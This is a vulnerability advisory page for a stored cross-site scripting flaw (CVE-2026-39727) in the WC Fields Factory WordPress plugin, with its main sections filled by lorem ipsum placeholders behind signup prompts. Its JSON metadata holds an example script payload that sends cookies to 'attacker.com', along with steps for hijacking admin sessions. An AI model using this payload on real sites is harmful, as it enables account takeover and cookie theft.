Sceawere

Vulnerability Detail

CVE-2026-39727UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV

WC Fields Factory Subscriber XSS

Vulnerability Metadata

Severity
Medium
Score / CVSS
6.5
Creation Date
16h ago
Vendor
Saravana Kumar K
Product
WC Fields Factory
Attack Type
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vector String
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Complexity
LOW

Narrative and Response

Description

Subscriber Cross Site Scripting (XSS) in WC Fields Factory <= 4.1.12 versions.

Executive Summary

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Executive Summary Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Technical Details

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Detailed Technical Analysis Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Mitigations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Remediation & Mitigations Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

References

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Intelligence References Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Additional Metadata

{
  "score": "6.5",
  "pubDate": "2026-10-06T09:17:44.987Z",
  "pubdate": "2026-10-06T09:17:44.987Z",
  "executiveSummary": "A Cross-Site Scripting (XSS) vulnerability exists in WC Fields Factory versions 4.1.12 and below. This security flaw allows authenticated users with subscriber-level privileges to inject malicious scripts into the web application. The vulnerability type is Stored Cross-Site Scripting, which occurs due to insufficient input sanitization of user-supplied data. The impact of this vulnerability is significant, as it enables an attacker to execute arbitrary JavaScript in the context of an administrator's or other users' sessions. By successfully exploiting this, an attacker could potentially hijack user accounts, capture sensitive session cookies, perform unauthorized actions on behalf of the victim, or redirect users to malicious domains. The vulnerability is exploitable by any authenticated subscriber, meaning the barrier to entry for an attacker is low once they have access to the platform. No specific external network exposure is required beyond the standard accessibility of the WordPress installation. Organizations utilizing affected versions are at risk of compromised integrity and confidentiality of their administrative dashboard and overall site functionality.",
  "technicalDetails": "The vulnerability originates from improper validation and sanitization of input fields handled by the WC Fields Factory plugin. Specifically, the plugin fails to adequately sanitize data submitted through its interface before storing it in the database and subsequently rendering it in the dashboard or front-end components. This oversight allows a malicious actor with subscriber-level access to inject crafted HTML and JavaScript payloads into the plugin's custom field definitions or user-defined field outputs.\nThe attack flow begins with a subscriber interacting with the plugin's input fields. Because the server-side processing routines do not implement context-aware output encoding or strict input filtering for these fields, the malicious payload is saved persistently within the WordPress database. When a privileged user, such as an administrator, navigates to the administrative interface where these fields are rendered, the browser interprets the stored payload as executable code rather than plain text.\nThe exploitation process typically involves the following steps: 1) The attacker authenticates as a subscriber. 2) The attacker navigates to the plugin configuration or field creation interface, where they inject a malicious script (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>) into a field parameter. 3) The application saves this malicious input without validation. 4) An unsuspecting administrator views the plugin settings or a page utilizing the corrupted field data. 5) The victim's browser executes the payload. 6) The script performs actions such as exfiltrating session tokens, modifying user data, or adding new administrative accounts via AJAX requests.\nThe component at fault is the input handler and output rendering logic within the WC Fields Factory plugin, which treats user-supplied strings as trusted HTML. This lack of output encoding (e.g., failing to use esc_html() or esc_attr() functions on sensitive data) is the primary root cause. Since the plugin operates within the context of the WordPress CMS, the injected script executes with the full privileges of the victim's session. The issue is persistent across the application, affecting any location where these custom fields are rendered. Version 4.1.12 and all prior iterations are confirmed to be susceptible, as they lack the necessary security headers and filtering mechanisms to prevent script injection by low-privileged authenticated users."
}
CVE-2026-39727: WC Fields Factory Subscriber XSS (MEDIUM Severity, CVSS: 6.5) | Sceawere